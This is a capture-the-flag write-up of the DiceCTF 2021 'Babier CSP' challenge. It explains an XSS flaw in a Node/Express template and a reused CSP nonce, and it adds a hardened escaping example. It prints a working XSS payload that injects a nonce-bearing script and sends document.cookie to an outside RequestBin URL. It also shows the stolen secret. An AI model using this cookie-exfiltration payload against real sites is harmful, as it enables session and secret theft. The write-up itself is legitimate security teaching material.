Rating: 4.5

# Babier CSP - (349 Solves/107 Points)

```
Baby CSP was too hard for us, try Babier CSP.

babier-csp.dicec.tf #Challenge site

https://us-east1-dicegang.cloudfunctions.net/ctf-2021-admin-bot?challenge=babier-csp #Admin bot
The admin will set a cookie secret equal to config.secret in index.js.
```

We are given an `index.js` containing the source code of the NodeJS backend. The challenge hints quite strongly at **XSS**: we have to **steal a cookie** whose value is `config.secret`, and that same value is the **path prefix under which the secret directory is served**, `app.use('/' + SECRET, express.static(__dirname + "/secret"));`, which presumably contains the flag.

The webpage is fairly simple: a "`View Fruit`" link picks one of the four fruits `"apple", "orange", "pineapple", "pear"`, sends it as the `name` **GET parameter**, and the server renders it back into the page through `${name}`.

```javascript
// name comes straight from the ?name= query string and is interpolated unescaped.
// The <a id="elem"> line is the "View Fruit" link the inline script refers to via `elem`.
const template = name => `
<html>

${name === '' ? '': `<h1>${name}</h1>`}
<a id="elem">View Fruit</a>

<script nonce=${NONCE}>
elem.onclick = () => {
  location = "/?name=" + encodeURIComponent(["apple", "orange", "pineapple", "pear"][Math.floor(4 * Math.random())]);
}
</script>

</html>
`;
```

We quickly realise that we can put **any HTML into `${name}`**, and hence this is vulnerable to **XSS**.
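As an added illustration (not code from the challenge or the original writeup), here is the vulnerable template beside a hardened version that HTML-escapes `name` before interpolation. `NONCE`, `escapeHtml`, `countScriptTags` and the `injectedName` input are my own placeholders and constructed values.

```javascript
// Added example: vulnerable template vs. one that escapes the user-controlled
// value. NONCE is a placeholder; the real app derives it from crypto.randomBytes.
const NONCE = "PLACEHOLDER_NONCE";

// Escape the characters that can break out of text or attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Vulnerable (same shape as the challenge): `name` is spliced into markup verbatim.
const vulnerableTemplate = name => `
<html>
${name === "" ? "" : `<h1>${name}</h1>`}
<a id="elem">View Fruit</a>
<script nonce=${NONCE}>elem.onclick = () => { location = "/?name=apple"; };</script>
</html>`;

// Hardened: identical layout, but the user value is escaped first, so any
// markup in `name` renders as text inside the <h1> instead of as elements.
const safeTemplate = name => `
<html>
${name === "" ? "" : `<h1>${escapeHtml(name)}</h1>`}
<a id="elem">View Fruit</a>
<script nonce=${NONCE}>elem.onclick = () => { location = "/?name=apple"; };</script>
</html>`;

// Number of <script elements in a rendered page; the legitimate page has one,
// and a user-supplied `name` must never raise that count.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed input: a name carrying a script element with the (leaked) nonce.
const injectedName = `<script nonce=${NONCE}>/* injected */</script>`;

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", countScriptTags(vulnerableTemplate(injectedName)), "script tag(s)");
  console.log("hardened:  ", countScriptTags(safeTemplate(injectedName)), "script tag(s)");
}
```

Escaping at the interpolation point removes the injection regardless of the CSP; the nonce then only has to protect against scripts that are already in the markup, which is the job it was designed for.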

However, there is also a **`nonce`** which complicates things slightly: **only `<script>` elements carrying the matching `nonce` attribute are allowed to run**, and **inline event handlers and `javascript:` URLs are blocked**. Thankfully, the `nonce` is a **constant**, generated once at process start rather than per request, `const NONCE = crypto.randomBytes(16).toString('base64');`, so it is the same for every response and we can read it straight from the page source:

```
nonce-LRGWAXOY98Es0zz0QOVmag==
```

But there is yet another measure to get past: the **Content-Security-Policy (CSP)** header.

```javascript
res.setHeader("Content-Security-Policy", `default-src none; script-src 'nonce-${NONCE}';`);
```

Any `fetch()` (or XHR) we try fails: the policy has no `connect-src`, so that request type falls back to `default-src`, which allows nothing. (Strictly, `none` without quotes is parsed as a host named `none` rather than the `'none'` keyword, but since no origin ever matches that host the effect is the same.) Navigations, on the other hand, are not governed by any directive in this policy, so assigning `location.href` sends the admin's browser, **cookie included in the URL**, to a server we control. Hence, our payload will look something like this:

```bash
https://babier-csp.dicec.tf/?name=%3Cscript%20nonce=LRGWAXOY98Es0zz0QOVmag==%3Elocation.href=%22https://requestbin.io/1lb35x71?data=%22%2Bdocument.cookie%3C/script%3E
#URL-Encoded

#URL-Decoded
https://babier-csp.dicec.tf/?name=<script nonce=LRGWAXOY98Es0zz0QOVmag==>location.href="https://requestbin.io/1lb35x71?data="+document.cookie</script>
```

Sending this via the `Admin Bot`, we get the cookie in our RequestBin:

```
secret=4b36b1b8e47f761263796b1defd80745
```

Visiting `https://babier-csp.dicec.tf/4b36b1b8e47f761263796b1defd80745/` (the cookie value is the secret path prefix from `index.js`), we find the flag in the page source.


Original writeup (https://github.com/IRS-Cybersec/ctfdump/tree/master/DiceGang%202021/web-Babier%20CSP).